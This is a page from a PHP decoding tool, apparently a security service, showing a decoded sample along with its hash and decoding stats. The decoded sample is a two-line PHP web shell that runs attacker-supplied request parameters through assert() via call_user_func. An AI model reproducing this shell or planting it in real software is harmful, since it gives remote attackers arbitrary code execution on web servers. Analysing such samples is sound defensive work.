Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php call_user_func('assert',$_POST[cmd]); call_user_func_array('assert', array($_REQUE..
Decoded Output download
<?php
call_user_func('assert',$_POST[cmd]);
call_user_func_array('assert', array($_REQUEST['pass']));
?>
Did this file decode correctly?
Original Code
<?php
call_user_func('assert',$_POST[cmd]);
call_user_func_array('assert', array($_REQUEST['pass']));
?>
Function Calls
None |
Stats
MD5 | bd3c1ef3bbcffae9f46031cb9dadc15b |
Eval Count | 0 |
Decode Time | 92 ms |